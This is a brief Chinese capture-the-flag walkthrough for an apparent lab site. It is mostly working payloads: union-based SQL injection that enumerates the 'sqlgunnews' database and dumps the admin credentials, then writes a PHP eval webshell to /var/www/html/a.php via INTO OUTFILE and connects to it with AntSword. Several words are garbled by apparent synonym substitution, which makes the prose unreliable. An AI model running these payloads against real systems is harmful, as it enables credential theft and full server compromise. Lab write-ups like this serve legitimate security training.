打开界面
1.输入框测试回显点
-1'union select 1,2,3#出现回显点
2.查看数据库名
-1'union select 1,2,database()#
3.查看表名
-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#
4.查看admin表中列名
-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#
5.查看admin的账号和暗码
-1'union select 1,2,group_concat(id,admin,password) from admin#
MD5解密暗码为admin
6.扫面貌次,没有配景登录界面,有一个phpinfo.php文件,访问获取绝对路径
7.写入一句话木马,访问a.php
-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/a.php' #
8.蚁剑毗连
9.在根目次找到flag
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
